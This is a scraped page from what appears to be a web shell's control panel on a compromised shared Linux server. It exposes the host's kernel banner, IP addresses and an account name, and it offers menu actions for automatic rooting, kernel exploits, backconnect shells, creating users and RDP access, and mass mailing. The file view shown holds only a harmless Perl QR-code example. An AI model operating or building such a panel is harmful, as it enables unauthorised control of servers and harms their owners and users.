Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libgd-barcode-perl /
examples /
QRCode /
[ HOME SHELL ]
Name
Size
Permission
Action
bar2.png
194
B
-rw-r--r--
bar2.txt
3.34
KB
-rw-r--r--
chkPng.pl
1.16
KB
-rw-r--r--
qrc4.png
210
B
-rw-r--r--
qrc4.txt.gz
253
B
-rw-r--r--
reschk.png
210
B
-rw-r--r--
testGD.pl
641
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : testGD.pl
use strict; use GD::Barcode::QRcode; # with GD::Barcode::QRcode; my $oGDB = GD::Barcode::QRcode->new('A' x 10, {Ecc=>'L', ModuleSize => 4 }); my $oGD = $oGDB->plot(); open OUT, '>', 'qrc4.png'; binmode OUT; print OUT $oGD->png; close OUT; open OUT, '>', 'qrc4.txt'; print OUT $oGDB->barcode(); close OUT; # with GD::Barcode; use GD::Barcode; my $oGDN = GD::Barcode->new('QRcode', 'A' x 10, {Ecc => 'L', ModuleSize => 2}); open OUT, '>', 'bar2.png'; binmode OUT; print OUT $oGDN->plot()->png; close OUT; open OUT, '>', 'bar2.txt'; print OUT $oGDN->barcode(); close OUT;
Close